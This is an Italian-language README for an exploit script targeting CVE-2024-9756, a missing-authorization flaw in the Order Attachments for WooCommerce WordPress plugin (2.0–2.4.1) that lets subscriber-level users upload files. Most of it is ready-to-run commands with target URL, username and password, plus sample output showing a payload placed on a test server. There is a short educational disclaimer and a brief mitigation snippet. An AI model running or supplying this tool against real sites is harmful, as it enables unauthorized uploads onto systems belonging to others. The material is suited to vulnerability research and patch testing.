
Order Attachments for WooCommerce 2.0 - 2.4.1 - Mancata Autorizzazione per Autenticato (Abbonato+) Caricamento Arbitrario Limitato di File
Questo exploit sfrutta una vulnerabilità di caricamento arbitrario limitato e non autorizzato nel plugin Order Attachments for WooCommerce (versioni 2.0 - 2.4.1) per WordPress.
La vulnerabilità consente a utenti autenticati (Subscriber+) di caricare tipi di file limitati senza la dovuta autorizzazione.
Questo script è solo a scopo educativo e di ricerca sulla sicurezza. Qualsiasi uso non autorizzato di questo exploit su sistemi di cui non si è proprietari è strettamente illegale.
Assicurati di avere quanto segue prima di eseguire l'exploit:
requests → Installa con:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
Esempio:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
Puoi specificare nomi di file personalizzati e ID ordine:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
In caso di successo, lo script restituirà l'URL del file caricato:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php per bloccare wp_ajax_wcoa_add_attachment da utenti non autorizzati:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
Questo exploit è pubblicato solo a scopo educativo e di ricerca sulla sicurezza.
L'uso non autorizzato contro sistemi senza esplicito permesso è illegale e punibile secondo le leggi sulla sicurezza informatica.
Usalo a tuo rischio e pericolo.